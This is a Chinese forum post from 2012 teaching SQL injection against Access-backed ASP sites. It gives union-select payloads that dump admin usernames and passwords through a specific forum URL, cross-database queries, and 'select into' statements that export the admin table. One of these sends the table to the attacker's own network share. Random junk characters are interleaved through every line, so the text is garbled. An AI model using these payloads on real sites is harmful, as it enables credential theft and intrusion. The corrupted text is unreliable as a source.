--------------------------------------------------------------7 Z) L( _) S4 O V' D2 N
union查询法
2 M# l* J( p* t; r) \9 v: p- m% Q首先要说的就是查询办法,一般的查询办法就是
7 W' w3 c' G6 @8 W) ?9 }9 S2 j( T3 o8 P4 g. }
程序代码# ]/ J* X- {; `0 K/ z
and 1=(select count(*) from admin where left(id,1)='1')3 J4 P5 P; y x C, v O8 A1 |
) Y2 y& d5 L/ `. L; X" ]. H) r8 J这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
$ }3 Z2 V/ Y* G% S所以这个时候,union select横空出现.别以为只能在PHP里用哦...: ~' C( f0 B4 V% ?
譬如你有一个ACCESS点:+ Z% q( s3 \' _
程序代码
# L3 m" Z) I( Uhttp://bbs.tian6.com/xiaoyang.asp?coder=1+ o O, I3 k. h0 c! s
& |2 C( y8 J1 l1 Y9 N5 Z知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),4 `, C' C1 J3 y+ A' d- h
然后我们直接来:( ^# O3 s! L1 R! a. y- q' H
程序代码
9 h* d. C' ?0 j: @http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]7 k9 t/ ^" M+ N9 I9 e
7 O* H; k' p% \: U
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了." j2 c! l; ?' z+ h
8 p+ s& B7 U$ G! `# @" r* O a6 M3 w* h3 y% f! H. Q; b% v
+ y/ v# p9 V& _$ O! f; E* A
---------------------------------------------------------------
" b6 ~3 s. X9 y8 X- q* _Access跨库查询
% ]; h* N# |$ K; B a4 w5 V有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.5 S0 s$ X5 W; r' ^! a( l
跨库的查询语句:
- |; ?8 w" i+ \, {" T: r子查询:
& C/ l$ O6 T- S2 S$ r$ I. K' j程序代码# k' t5 D- D0 ]+ E! _4 x
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
! z3 B* I3 r. m9 w1 E2 O# P2 ^ ?+ U; x, o6 ~# X0 s' p8 N
union查询:
: _4 W8 A. L+ }( ?* t W/ o程序代码; I1 t) e3 e; {; w& r* f
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
: o8 k1 u% ?+ [ J, m
, ?$ [0 V. H" a2 N0 T! D跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:: N" ^* H' e4 c& I
程序代码2 J7 L- P6 Y* I2 [1 H9 l
http://www.4ngel.net/article/46.htm 0 y; i% ~" k( ?% |. F
http://hf110.com/Article/hack/rqsl/200502/66.html
/ t/ \4 x. @6 `5 t- B" e
* `& T: u9 z) e5 d---------------------------------------------------------------
6 z: d. w+ W+ P8 o3 M* G: l1 eAccess注入,导出txt,htm,html
& K, U4 I; o! g; l8 j% \, f子查询语句:0 A0 t# y; L/ c/ P* ~
程序代码# I$ O( u! D7 o4 A: c
Select * into [test.txt] in 'd:\web\' 'text;' from admin
1 t6 r0 c% B9 X9 P+ H' h* b
, `* N/ Z. c# F# y3 `1 B这样就把admin表的内容以test类型存进了d:\web里面.
8 ? b P- l1 a8 o1 y" ~9 {UNION查询:- _! G1 D- @$ e- H. {8 x/ e
程序代码8 t* J- n: I) c; y. P1 X
union select * into [admin.txt] in 'c:\' 'test;' from admin4 h5 k* v2 F' q$ l4 R5 G* \+ |# l
- S: G0 b" b# v4 X
而且这里也可以保存到本地来:
, d* r+ b7 I3 W: y程序代码6 ^5 R9 i. C" v% z
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
+ j) }* Q: u( Z. A1 O. I9 @) ]) D/ Z1 y6 C w
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:2 Q/ C) M/ ]0 ~! T k4 l
% r8 |, C, w C
程序代码
; i# c [) i1 g/ G$ D4 b- Ghttp://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7! \- w& ^, A% \) E4 z' r v
8 ~% r! [5 R6 S& P2 r9 e# B. [; a: ?因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
* I+ z/ o6 R; o- S6 W9 o3 K |
发表于 2012-9-15 14:20:57
收藏
支持
反对